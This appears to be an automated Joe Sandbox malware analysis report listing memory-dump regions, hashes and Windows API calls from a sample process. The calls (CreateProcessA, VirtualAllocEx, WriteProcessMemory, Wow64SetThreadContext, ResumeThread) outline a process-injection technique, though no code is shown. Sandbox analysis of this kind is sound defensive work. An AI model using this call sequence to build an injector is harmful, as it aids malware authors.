Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 23f104d5216fa2b7e3b6857d495b0d4a91e9b774c9489af85b0e216f29987a3c
• Instruction ID: 1527d0e9738a788ccd2b7f0bdff6594a54880f845c96a20808acc1052192337c
• Opcode Fuzzy Hash: 23f104d5216fa2b7e3b6857d495b0d4a91e9b774c9489af85b0e216f29987a3c
• Instruction Fuzzy Hash: 73A15B71D00219DFDB20CFA8CC41BADBBB6BF48314F1585A9D809AB240DB759985CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56de088, containing a call to CreateProcessA
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056DE2BE
Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: fc6e9160eed7b6232e1154c7e08c1f5de9b30ee6d3cd2652aea38ab16ef8de89
• Instruction ID: 627e1d3b3b7f4957a1690eece1b6b0409d5aa7786496f84c6f1f8e904d8278c7
• Opcode Fuzzy Hash: fc6e9160eed7b6232e1154c7e08c1f5de9b30ee6d3cd2652aea38ab16ef8de89
• Instruction Fuzzy Hash: D1914A71D00219DFDB20DFA8CC41BADFBB6BF48314F1585A9D809AB240DB759985CFA2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 24bae70, containing a call to GetModuleHandleW
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 024BB0C6
Memory Dump Source
• Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 00e6a7836345e1336aac73ad0995076fd41ee4742fe57e70d7c927f4bc01347b
• Instruction ID: f12f2b4f762496632761d764444e273afe682573bdfb5f9e6958c4f6a09ba4d9
• Opcode Fuzzy Hash: 00e6a7836345e1336aac73ad0995076fd41ee4742fe57e70d7c927f4bc01347b
• Instruction Fuzzy Hash: 717113B0A00B158FD725DF6AD04479ABBF1FF88304F00892AD48A97A50D775E94ACBA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 24b4248, containing a call to CreateActCtxA
APIs
• CreateActCtxA.KERNEL32(?), ref: 024B59C9
Memory Dump Source
• Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 2ce80388e8e040e9560041c0e0fca17d5372f5b9efff4aae3369a2be625382e9
• Instruction ID: 2b364a79f35573094d491473ec8395af4549fbd3aac11b14e6da6d028ff1ccfa
• Opcode Fuzzy Hash: 2ce80388e8e040e9560041c0e0fca17d5372f5b9efff4aae3369a2be625382e9
• Instruction Fuzzy Hash: A741CFB0C0061DCBDB24DFA9C884ADEFBF5BF49304F64806AD408AB255DB756989CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 24b590d, containing a call to CreateActCtxA
APIs
• CreateActCtxA.KERNEL32(?), ref: 024B59C9
Memory Dump Source
• Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: d5ee782c97ef781ec2d2768643bea48f488500526d220678c9da1e51dc094f65
• Instruction ID: 8defbf55c8ed9f49a8e33c9b228c47927331b70e0c48a24fb2c9b70d13a735c9
• Opcode Fuzzy Hash: d5ee782c97ef781ec2d2768643bea48f488500526d220678c9da1e51dc094f65
• Instruction Fuzzy Hash: 5D41CFB0C00619CFDB24DFA9C9846CEBBB5BF49304F24806AD408BB265DB756989CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56dd9f8, containing a call to WriteProcessMemory
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056DDA90
Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 6bc170978a85334bbfeed6ec72dbff5534f4af0f6a4e3e0acecd2058f468fa82
• Instruction ID: 103284d0603de247e8803181024069925399d80643ec65b52a1268e2d59b3ca5
• Opcode Fuzzy Hash: 6bc170978a85334bbfeed6ec72dbff5534f4af0f6a4e3e0acecd2058f468fa82
• Instruction Fuzzy Hash: 7C2146B59003499FCB10DFA9C885BDEBBF5FF48310F148829E959A7250D778A944CBA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56dda00, containing a call to WriteProcessMemory
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056DDA90
Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: c82f265ace59b276f1d72e9883e53f65878dc86833cfc4c01526d366371575fa
• Instruction ID: ad429547afed06b102699f77c9b1654349e40b226c188ae13b1a775fe1c5144f
• Opcode Fuzzy Hash: c82f265ace59b276f1d72e9883e53f65878dc86833cfc4c01526d366371575fa
• Instruction Fuzzy Hash: 4C2157B1D003099FCB10DFA9C884BDEBBF5FF48310F148829E959A7240D7789944CBA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56ddae8, containing a call to ReadProcessMemory
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DDB70
Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: d0f34352fc763dfe7340241dc84d509242319280f37b83ad80fc62b25ab7f6b6
• Instruction ID: dca9401a05bea59ef4aa9b7ebf00e8d28ed739c0627c7f1c7e33c02ee1c3fa30
• Opcode Fuzzy Hash: d0f34352fc763dfe7340241dc84d509242319280f37b83ad80fc62b25ab7f6b6
• Instruction Fuzzy Hash: 012136B5C003499FCB10DFAAC885ADEFBF5FF48320F108429E558A7250C738A944CBA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56dd860, containing a call to Wow64SetThreadContext
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056DD8E6
Memory Dump Source
• Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 53ae01e1f9182d1b0b1fd6f4a18bf8e130afe4651714d4145e20a7e984af320f
• Instruction ID: 25e7ab1ab4a076a32e861d1eaa5e767dd72d193aa47e94c62c8fb4fc29d4007e
• Opcode Fuzzy Hash: 53ae01e1f9182d1b0b1fd6f4a18bf8e130afe4651714d4145e20a7e984af320f
• Instruction Fuzzy Hash: FA2125B5D003098FDB10DFAAC4857EEBBF4EB88324F548429D459A7241CB78A985CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 24bc9e0, containing a call to DuplicateHandle
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD306,?,?,?,?,?), ref: 024BD3C7
Memory Dump Source
• Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ed970ccf287305452574b3eae21352da25bd9ec87c9e88bea7683641db3fa1e9
• Instruction ID: a7331badbefb61b61dd1af0882b58db50266a47ae7a99565e994b86118f00079
• Opcode Fuzzy Hash: ed970ccf287305452574b3eae21352da25bd9ec87c9e88bea7683641db3fa1e9
• Instruction Fuzzy Hash: C721E3B5D00308DFDB10CF9AD584ADEBBF4EB48320F14846AE918A7351D378A950CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 24bd338, containing a call to DuplicateHandle
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD306,?,?,?,?,?), ref: 024BD3C7
Memory Dump Source
• Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 1950dfb061ffad5d3007c2de1ef6805df4d8eba3618b089cfc8b30d97dcd278f
• Instruction ID: a768535f210da8de12501e6048e59cec27f5d2830ab3a61e4b050d34ef736d97
• Opcode Fuzzy Hash: 1950dfb061ffad5d3007c2de1ef6805df4d8eba3618b089cfc8b30d97dcd278f
• Instruction Fuzzy Hash: 592103B5D00208DFDB10CFAAD584ADEBFF5EB48324F14801AE918A3311C378A950CFA1
Uniqueness
Uniqueness Score: -1.00%

                                                                              Control-flow Graph (interactive graph image not reproduced; legend was Executed / Not Executed; block ranges and edges as dumped below, with the Wow64SetThreadContext call in block 56dd8c3-56dd8f3)
                                                                              control_flow_graph 614 56dd868-56dd8b3 616 56dd8b5-56dd8c1 614->616 617 56dd8c3-56dd8f3 Wow64SetThreadContext 614->617 616->617 619 56dd8fc-56dd92c 617->619 620 56dd8f5-56dd8fb 617->620 620->619
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056DD8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 7321484af5f80eb6faf2de2ea1eba374ffed796bca54f88fa186cde3ec8b37a8
                                                                              • Instruction ID: fc0b0dc26f0b8b83f400a5d9faf34501c5589de7790f1a325e29483a03ef055b
                                                                              • Opcode Fuzzy Hash: 7321484af5f80eb6faf2de2ea1eba374ffed796bca54f88fa186cde3ec8b37a8
                                                                              • Instruction Fuzzy Hash: 3921F5B1D042098FDB10DFAAC4857AEBBF4AB88324F148429D459A7241CB78A985CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056DDB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 3aa7413420d252bf679af5bc9e9bacbe00d3eada76c658d235aa98898b2dcf2e
                                                                              • Instruction ID: 372fcfac79f5d7a25a1c091430ae585a8e081a01508b42bf6f7d425a749afeb8
                                                                              • Opcode Fuzzy Hash: 3aa7413420d252bf679af5bc9e9bacbe00d3eada76c658d235aa98898b2dcf2e
                                                                              • Instruction Fuzzy Hash: C02139B1D003599FCB10DFAAC844ADEFBF5FF48320F108429E559A7250C7389544CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056DD9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 3b5819db5f00ef847c13f786f0f0411597e01fc91b4aeece3a2894b7049fd777
                                                                              • Instruction ID: cd796c563ac59b9efccaad4689c453e58af2c6d837baa3b60d93a8e4fae3d2ce
                                                                              • Opcode Fuzzy Hash: 3b5819db5f00ef847c13f786f0f0411597e01fc91b4aeece3a2894b7049fd777
                                                                              • Instruction Fuzzy Hash: 4E1159759002499FCB10DFA9C845BDEFFF5EF88324F148819E559A7250C735A544CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,024BB141,00000800,00000000,00000000), ref: 024BB352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 9d6e77de1ac0a28870f9fd23b8ff196b429933fcdf00537d6b8c6302bc17a553
                                                                              • Instruction ID: e7ea02185c1c5dfe765faaba7caf1f30a4c7fea4e4b00c8197ab0ad40545bb47
                                                                              • Opcode Fuzzy Hash: 9d6e77de1ac0a28870f9fd23b8ff196b429933fcdf00537d6b8c6302bc17a553
                                                                              • Instruction Fuzzy Hash: C71114B69003089FDB10DF9AC448ADEFBF4EF48324F14842AD819A7210C375A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,024BB141,00000800,00000000,00000000), ref: 024BB352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 5d559bb92e716c9803e3800e656a5cdc9b43f1cf1905378b3f9f58384de03d57
                                                                              • Instruction ID: 7233b1d86141632bf76cdd68073518c48d64e175f16fea6ff5002d6a2ab80622
                                                                              • Opcode Fuzzy Hash: 5d559bb92e716c9803e3800e656a5cdc9b43f1cf1905378b3f9f58384de03d57
                                                                              • Instruction Fuzzy Hash: B11112B69003488FCB14CF9AC484ADEFBF4EF88324F14846AD819A7210C379A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056DD9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 89ce15bd30519de7c473143778950c41b1d5806f552c8b2e7871d3f3e862089e
                                                                              • Instruction ID: 55e27fd493c891500e64373e212b01701ca869f7d6e8cb72b353a02836bf24a8
                                                                              • Opcode Fuzzy Hash: 89ce15bd30519de7c473143778950c41b1d5806f552c8b2e7871d3f3e862089e
                                                                              • Instruction Fuzzy Hash: 7E1167719002489FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C735A540CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: eb7f473e692c8c1b8f23e9cccd793931262bf8aeda7bc0f07b2c8ebffac97eaa
                                                                              • Instruction ID: b1005213d4c3775c1359002a61403adf7e0805b31968327f96c6d4b9019991c7
                                                                              • Opcode Fuzzy Hash: eb7f473e692c8c1b8f23e9cccd793931262bf8aeda7bc0f07b2c8ebffac97eaa
                                                                              • Instruction Fuzzy Hash: 8F1158B5D003488BCB10DFAAC8457DEFBF5EB88324F248429D419A7250C639A944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 3798d57be7937bc8c0eb5207c5314ae54c74505830f7a2bd11c294d538c6985a
                                                                              • Instruction ID: 980653f50e21f0b7c72ff3778e77e10b89cbc02d6865b0004d57bcef4a6de361
                                                                              • Opcode Fuzzy Hash: 3798d57be7937bc8c0eb5207c5314ae54c74505830f7a2bd11c294d538c6985a
                                                                              • Instruction Fuzzy Hash: DF1136B1D003488FCB20DFAAC4457DEFBF5EB88324F248829D459A7250CB79A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024BB0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: af8a5419e7b1c8c5eabadea332c78f71aa011fdbd061d8f9dce389f7c57f74e3
                                                                              • Instruction ID: 8752541f9ba15fd838cd98053928bae1b6ed33df2c284869125af1fde035ac1e
                                                                              • Opcode Fuzzy Hash: af8a5419e7b1c8c5eabadea332c78f71aa011fdbd061d8f9dce389f7c57f74e3
                                                                              • Instruction Fuzzy Hash: 6C110FB5D003498FCB20DF9AC444ADEFBF4EF88224F10842AD828B7610C379A545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0A120355
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1719577260.000000000A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_a120000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 86db41c5c06b40a75d9b6a0025db73c672422a7cc1fa290284ec11777372fa41
                                                                              • Instruction ID: 2ba57c2b22af0ea06751be7084c0eb255b642eed6bf1b23d1bb5119deb510e23
                                                                              • Opcode Fuzzy Hash: 86db41c5c06b40a75d9b6a0025db73c672422a7cc1fa290284ec11777372fa41
                                                                              • Instruction Fuzzy Hash: 3E11F5B58003499FDB20DF99D845BDEBFF8EB48324F148419D558A7250C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0A120355
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1719577260.000000000A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_a120000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 38ed046b9af5881727fac2debc47e49597e48f7ff44c76e9724ee614443776be
                                                                              • Instruction ID: d608a5b27d172eaa7d066b7f473de9d799ad165fc648759aa04a06bc199359d3
                                                                              • Opcode Fuzzy Hash: 38ed046b9af5881727fac2debc47e49597e48f7ff44c76e9724ee614443776be
                                                                              • Instruction Fuzzy Hash: 5E11F2B58003489FDB20DF9AD848BDEBBF8EB48320F108419D558A7210C379A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Te^q
                                                                              • API String ID: 0-671973202
                                                                              • Opcode ID: b781622614ac200e88e2ab5db589d2033abed8707ebab5840501098b114cb621
                                                                              • Instruction ID: ca0014955c331c1fdbd53ae01a3c0c3562e458c062d9fbcdcee87f72d5cd4e70
                                                                              • Opcode Fuzzy Hash: b781622614ac200e88e2ab5db589d2033abed8707ebab5840501098b114cb621
                                                                              • Instruction Fuzzy Hash: 64412874949209CFDB64EF68D498BFDBBB5FB09310F109699E409A7351CB309949CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa4202360abc72c659a28d67160a0441dd63105ef92273d0d30b5505088f0a6c
                                                                              • Instruction ID: 2d8999b1baef744dba34ba9fb0fe1a80672e82b7fbf3209903094fb73e40a7b2
                                                                              • Opcode Fuzzy Hash: aa4202360abc72c659a28d67160a0441dd63105ef92273d0d30b5505088f0a6c
                                                                              • Instruction Fuzzy Hash: 44710074D05218CFCB00EFA8D484AFDBBBAFB49300F10AA19D815A7345E7B69999CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf70927d25f1f07b78605b309a71c51f46076d851e06ea8965d3a59ae2d0ab80
                                                                              • Instruction ID: 26cc34783c5b052118026e9a4aad7c70de35b1c435faa715cd02d06f96009f44
                                                                              • Opcode Fuzzy Hash: cf70927d25f1f07b78605b309a71c51f46076d851e06ea8965d3a59ae2d0ab80
                                                                              • Instruction Fuzzy Hash: F8412B70A08109DFC704EF59D5889BEBBFAFF9E300B51A194D409AB296D770D951CF21
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d9cfed51c10d4aa594411cdb79310379de8489df19cc5910f9bbedba9d069e8
                                                                              • Instruction ID: ede032a7421955b41406176f4609c63f658062fe825949426e05936deabefd58
                                                                              • Opcode Fuzzy Hash: 3d9cfed51c10d4aa594411cdb79310379de8489df19cc5910f9bbedba9d069e8
                                                                              • Instruction Fuzzy Hash: B641F874E04218EFCB00EFA9E884AEDBBB9FB49310F109625E505B7390D7759A91CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              • Opcode Fuzzy Hash: a1db7bfedebd90fe5624e7c0bb0f589fa864a79ab63bfce2ffe098b0a6b8593a
                                                                              • Instruction Fuzzy Hash: DBE0ED74E05208EFC784EFA8D5446ACBBF4FB48310F10C5E9981893341DA355E45DF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ecc9c53b3f96f580ead011036692446310cbaf45beeb4940e2116435719f49c
                                                                              • Instruction ID: 599bf237c063eef062016d7a485956550a47d00a9ae74fa6bbd64da46ec56a41
                                                                              • Opcode Fuzzy Hash: 3ecc9c53b3f96f580ead011036692446310cbaf45beeb4940e2116435719f49c
                                                                              • Instruction Fuzzy Hash: B1E06D3181B308EFDB45DF98E19D5ACBBB6FF45300F200A96E40A97150EB304945CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 532eb4773fd86ee13932f08d1226f7939986b87fef3c08575b1efdc1869242b9
                                                                              • Instruction ID: 662e5aa483bc7ba3893162831ce167d2f6edefcdd08a96434fe261aacabc4af1
                                                                              • Opcode Fuzzy Hash: 532eb4773fd86ee13932f08d1226f7939986b87fef3c08575b1efdc1869242b9
                                                                              • Instruction Fuzzy Hash: 64E0E674E05108DFC784EFA8D9496ACBBF4EB48614F1085E99809D3741DA319E45DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ee95e5a5c48413632b277e70afcf0a833b68b72a7464cfe5ba870fd7dd562368
                                                                              • Instruction ID: b99b92d736688d9acb381a478d0eb9ebf90e9c3292f09f285d56b65b8a864bcb
                                                                              • Opcode Fuzzy Hash: ee95e5a5c48413632b277e70afcf0a833b68b72a7464cfe5ba870fd7dd562368
                                                                              • Instruction Fuzzy Hash: 48E0C27094520CFBC700EFA4E6046AD7BFDEB89301F1065E5D406932A0EA769E85DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

